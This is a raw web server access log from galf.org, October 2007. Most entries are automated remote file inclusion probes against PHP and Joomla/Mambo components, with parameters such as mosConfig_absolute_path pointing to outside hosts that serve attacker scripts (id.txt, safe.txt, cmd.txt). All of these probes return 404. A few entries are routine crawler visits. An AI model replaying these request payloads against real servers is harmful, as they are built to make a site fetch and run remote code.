72.232.167.105 - - [07/Oct/2007:19:51:45 -0700] "GET /logs/access_070826.log/4nAlbum/public/displayCategory.php?basepath=http://www.kustomwagens.com/phpbb2/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.167.105 - - [07/Oct/2007:19:51:48 -0700] "GET /logs/access_070826.log/4nalbum/public/displayCategory.php?basepath=http://www.kustomwagens.com/phpbb2/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.213.143.27 - - [07/Oct/2007:19:53:03 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts)" "www.galf.org"
70.86.74.178 - - [07/Oct/2007:19:54:20 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://manxdate.com/id_img/about.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.74.178 - - [07/Oct/2007:19:54:21 -0700] "GET //skin/zero_vote/error.php?dir=http://manxdate.com/id_img/about.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
204.239.167.90 - - [07/Oct/2007:19:54:29 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.coverbands.info/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
204.239.167.90 - - [07/Oct/2007:19:54:30 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.coverbands.info/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
84.18.200.169 - - [07/Oct/2007:19:55:18 -0700] "GET /logs/access_070625.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kadastra.com/de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.200.169 - - [07/Oct/2007:19:55:19 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kadastra.com/de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.200.169 - - [07/Oct/2007:19:55:54 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.kadastra.com/de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.200.169 - - [07/Oct/2007:19:55:54 -0700] "GET //skin/zero_vote/error.php?dir=http://www.kadastra.com/de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
84.18.200.169 - - [07/Oct/2007:19:57:02 -0700] "GET /logs/index.php?go=http://www.kadastra.com/de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.200.169 - - [07/Oct/2007:19:57:03 -0700] "GET /index.php?go=http://www.kadastra.com/de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.72.112.111 - - [07/Oct/2007:19:57:54 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.111 - - [07/Oct/2007:19:57:54 -0700] "GET //skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.111 - - [07/Oct/2007:19:58:35 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.111 - - [07/Oct/2007:19:58:36 -0700] "GET //skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
74.6.28.204 - - [07/Oct/2007:19:59:15 -0700] "GET /logs/access_070618.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
84.18.200.169 - - [07/Oct/2007:20:02:13 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kadastra.com/de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.200.169 - - [07/Oct/2007:20:02:13 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kadastra.com/de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
219.94.128.37 - - [07/Oct/2007:20:02:13 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tryon.pagebr.com/fei/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.64.67.140 - - [07/Oct/2007:20:03:00 -0700] "GET /index.php?inc=http://www.tryon.pagebr.com/fei/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.3 - - [07/Oct/2007:20:05:20 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt?http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.3 - - [07/Oct/2007:20:05:20 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt?http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.64.67.140 - - [07/Oct/2007:20:05:51 -0700] "GET /logs/index.php?inc=http://www.tryon.pagebr.com/fei/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.64.67.140 - - [07/Oct/2007:20:05:52 -0700] "GET /index.php?inc=http://www.tryon.pagebr.com/fei/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.74.178 - - [07/Oct/2007:20:07:03 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://manxdate.com/id_img/about.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
208.64.67.140 - - [07/Oct/2007:20:08:08 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tryon.pagebr.com/fei/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.64.67.140 - - [07/Oct/2007:20:08:08 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tryon.pagebr.com/fei/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.74.178 - - [07/Oct/2007:20:12:12 -0700] "GET /logs/access_070910.log//skin/zero_vote/error.php?dir=http://manxdate.com/id_img/about.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.203.122.135 - - [07/Oct/2007:20:14:39 -0700] "GET /logs/access.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.203.122.135 - - [07/Oct/2007:20:14:39 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.203.122.135 - - [07/Oct/2007:20:20:20 -0700] "GET /logs/access_070730.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.18.200.169 - - [07/Oct/2007:20:20:32 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.kadastra.com/de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
84.18.200.169 - - [07/Oct/2007:20:23:35 -0700] "GET /logs/access_070820.log//skin/zero_vote/error.php?dir=http://www.kadastra.com/de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.57.189.226 - - [07/Oct/2007:20:24:27 -0700] "GET /logs/access_070826.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.55.208.227 - - [07/Oct/2007:20:27:36 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.227 - - [07/Oct/2007:20:27:37 -0700] "GET /logs/access_070604.log HTTP/1.0" 200 311019 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
80.249.116.19 - - [07/Oct/2007:20:39:34 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.249.116.19 - - [07/Oct/2007:20:39:34 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.249.116.19 - - [07/Oct/2007:20:39:35 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.222.3.125 - - [07/Oct/2007:20:39:59 -0700] "GET /logs/access_070521.log?t=&postorder=desc HTTP/1.1" 200 199384 "-" "-" "www.galf.org"
208.113.160.24 - - [07/Oct/2007:20:40:32 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.160.24 - - [07/Oct/2007:20:40:32 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:20:41:08 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:20:41:08 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.249.116.19 - - [07/Oct/2007:20:41:14 -0700] "GET /logs/access_070625.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
80.249.116.19 - - [07/Oct/2007:20:41:14 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.249.116.19 - - [07/Oct/2007:20:41:14 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.113.160.24 - - [07/Oct/2007:20:45:34 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.160.24 - - [07/Oct/2007:20:45:34 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.160.24 - - [07/Oct/2007:20:45:46 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.160.24 - - [07/Oct/2007:20:45:46 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:20:46:00 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:20:46:00 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:20:46:10 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:20:46:10 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.184.193 - - [07/Oct/2007:20:47:07 -0700] "GET /logs/index2.php?x=http://mastergold.sitesled.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.184.193 - - [07/Oct/2007:20:47:08 -0700] "GET /index2.php?x=http://mastergold.sitesled.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.184.193 - - [07/Oct/2007:20:47:08 -0700] "GET /logs/index2.php?x=http://www.myspacegames.us/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.184.193 - - [07/Oct/2007:20:47:08 -0700] "GET /index2.php?x=http://www.myspacegames.us/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
76.106.7.20 - - [07/Oct/2007:20:51:15 -0700] "GET /logs/scripts.log HTTP/1.1" 200 126438 "http://www.google.com/search?hl=en&q=evil-c0der&btnG=Google+Search" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
76.106.7.20 - - [07/Oct/2007:20:51:16 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:20:53:55 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:20:53:55 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:20:53:55 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:20:53:56 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.223.101.68 - - [07/Oct/2007:20:54:23 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:20:56:28 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:20:56:28 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.249.135.12 - - [07/Oct/2007:20:57:46 -0700] "GET /logs/index.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.249.135.12 - - [07/Oct/2007:20:57:47 -0700] "GET /index.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.52.203.15 - - [07/Oct/2007:20:58:00 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cafe.gushare.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
67.52.203.15 - - [07/Oct/2007:20:58:00 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cafe.gushare.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
64.72.112.19 - - [07/Oct/2007:20:58:58 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://rhama.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:21:00:09 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:21:00:09 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.55.212.143 - - [07/Oct/2007:21:05:31 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.212.143 - - [07/Oct/2007:21:05:36 -0700] "GET /logs/access_070903.log HTTP/1.0" 200 2478763 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:21:05:56 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:21:05:56 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.160.24 - - [07/Oct/2007:21:06:23 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.160.24 - - [07/Oct/2007:21:06:23 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:21:07:16 -0700] "GET /logs/access_070806.log/index.php?x=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
72.0.130.226 - - [07/Oct/2007:21:07:16 -0700] "GET /index.php?x=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
72.0.130.226 - - [07/Oct/2007:21:07:16 -0700] "GET /logs/index.php?x=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.223.101.68 - - [07/Oct/2007:21:08:22 -0700] "GET /logs/access_070716.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.223.101.68 - - [07/Oct/2007:21:08:22 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:21:10:54 -0700] "GET /logs/access_070730.log/index.php?x=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
83.223.101.68 - - [07/Oct/2007:21:12:15 -0700] "GET /logs/access_070827.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:21:12:41 -0700] "GET /logs/access_070827.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:21:12:41 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:21:12:41 -0700] "GET /logs/access_070827.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:21:12:42 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:21:14:45 -0700] "GET /logs/access_070716.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.0.130.226 - - [07/Oct/2007:21:14:46 -0700] "GET /logs/access_070716.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/index.php?_SESSION[docroot_path]=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.113.160.24 - - [07/Oct/2007:21:16:06 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.160.24 - - [07/Oct/2007:21:16:06 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.249.116.19 - - [07/Oct/2007:21:16:16 -0700] "GET /logs/access_070618.log//components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:21:16:24 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:21:16:24 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.184.193 - - [07/Oct/2007:21:18:18 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.myspacegames.us/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
81.169.184.193 - - [07/Oct/2007:21:18:19 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.myspacegames.us/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.184.193 - - [07/Oct/2007:21:18:35 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://mastergold.sitesled.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.184.193 - - [07/Oct/2007:21:18:36 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://mastergold.sitesled.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
212.16.254.36 - - [07/Oct/2007:21:19:01 -0700] "GET /logs/mvcw_conver.php?step=1&vwar_root=http://seti.com.ua/img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
212.16.254.36 - - [07/Oct/2007:21:19:02 -0700] "GET /mvcw_conver.php?step=1&vwar_root=http://seti.com.ua/img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
212.16.254.36 - - [07/Oct/2007:21:19:10 -0700] "GET /logs/mvcw_conver.php?step=1&vwar_root=http://seti.com.ua/img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.16.254.36 - - [07/Oct/2007:21:19:11 -0700] "GET /mvcw_conver.php?step=1&vwar_root=http://seti.com.ua/img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.103.42 - - [07/Oct/2007:21:19:15 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.103.42 - - [07/Oct/2007:21:19:15 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.103.42 - - [07/Oct/2007:21:19:21 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://svurology.com/images/avatars/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.103.42 - - [07/Oct/2007:21:19:22 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://svurology.com/images/avatars/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.103.42 - - [07/Oct/2007:21:19:31 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://johnsonlowefamily.com/ancestry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.103.42 - - [07/Oct/2007:21:19:31 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://johnsonlowefamily.com/ancestry/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.55.208.230 - - [07/Oct/2007:21:19:54 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.230 - - [07/Oct/2007:21:19:58 -0700] "GET /logs/?D=A HTTP/1.0" 200 5069 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
209.59.205.211 - - [07/Oct/2007:21:23:18 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.911auction.info/logs/ajeXpl/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
209.59.205.211 - - [07/Oct/2007:21:23:18 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.911auction.info/logs/ajeXpl/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.84.103.42 - - [07/Oct/2007:21:27:45 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.911auction.info/logs/ajeXpl/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.103.42 - - [07/Oct/2007:21:27:45 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.911auction.info/logs/ajeXpl/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.103.42 - - [07/Oct/2007:21:28:07 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.911auction.info/logs/ajeXpl/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
